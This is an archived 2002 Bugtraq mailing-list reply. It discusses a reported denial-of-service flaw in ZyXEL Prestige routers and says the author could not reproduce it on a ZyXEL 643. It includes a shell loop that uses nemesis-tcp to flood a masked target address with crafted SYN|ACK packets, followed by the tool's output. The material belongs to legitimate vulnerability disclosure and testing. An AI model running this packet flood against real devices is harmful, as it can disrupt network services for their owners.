Re [BUGTRAQ] : ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS

From: Rich Henning (seclstsat_private)
Date: Mon Jun 17 2002 - 10:13:57 PDT

  • Next message: KF: "Clarification - IE gopher cross site scripting"

    Sorry moderators, I accidently replied with this to bugtraq, but it
    should probably have gone to vuln-dev.  my apologies.
    
    On Mon, Jun 17, 2002 at 02:59:11PM +0200, Kistler Ueli wrote:
    > ZyXEL Prestige 642R-11 AJ.6 has a problem handling special packets.
    > It is possible to send a packet that will make unavailable
    > the router's services (Telnet&FTP, DHCP service not tested).
    > Network traffic isn't stopped.
    > 
    > Possibly more ZyNOS based routers are vulnerable. Please reply if you
    > found any other ZyNOS based router vulnerable.
    
    I was unable to reproduce this behavior on my Zyxel 643 ADSL router,
    even under extremely heavy (continuous) SYN|ACK packet flooding to
    several ports.  excerpt of one such test session follows, concluded with
    ZyNOS information.
    
    Immediately after single-packet, during continuous bombardment, and
    afterwards, I was able to access the configuration menu via telnet.
    
    The FTP and HTTP services are disabled on my router, and the only
    firewall rule is to protect the SNMP Service of the Zyxel itself from
    the WAN side, as I have a linux 2.4/netfilter box that protects the LAN
    side of the internal network.
    
    
    Thanks for the heads-up Kistler!
    
    ---
    # while /bin/true; do nemesis-tcp -v -fS -fA -S xxx.xxx.xxx.xxx -D yyy.yyy.yyy.yyy -y 40023 -d eth0; done
    
     [ ...repeatedly... ]
    
    TCP Packet Injection -=- The NEMESIS Project 1.32
    Copyright (C) 1999, 2000, 2001 Mark Grimes <obecianat_private>
    Portions copyright (C) 2001 Jeff Nathan <jeffat_private>
    
    [IP]  xxx.xxx.xxx.xxx > yyy.yyy.yyy.yyy 
    [MAC]  00:90:27:62:5A:D6 > 0D:0E:0A:0D:00:01
    [Ports] 42069 > 40023
    [Flags]  SYN ACK 
    [TCP Urgent Pointer] 2048
    [Window Size] 512
    [ACK number] 420
    [Sequence number] 420
    [IP ID] 0
    [IP TTL] 254
    [IP TOS] 0x18
    [IP Frag] 0x4000
    [IP Options] 
    Wrote 54 byte TCP packet through linktype 1
    
    TCP Packet Injected
    
    ---
    
    ZyNOS F/W Version: V2.50(AY.1) | 9/19/2001
    ADSL Chipset Vendor: Alcatel, Version  3.6.70
    Standard: G.DMT
    
    -- 
    [ rich henning      ]                                             /"\
    [ henninrpat_private ]                                             \ /
                                                                       X
    support the ascii ribbon campaign against html e-mail             / \
    
    pgp: http://diss0nance.lawngnome.org/pgp_public.txt
    



    This archive was generated by hypermail 2b30 : Mon Jun 17 2002 - 20:14:49 PDT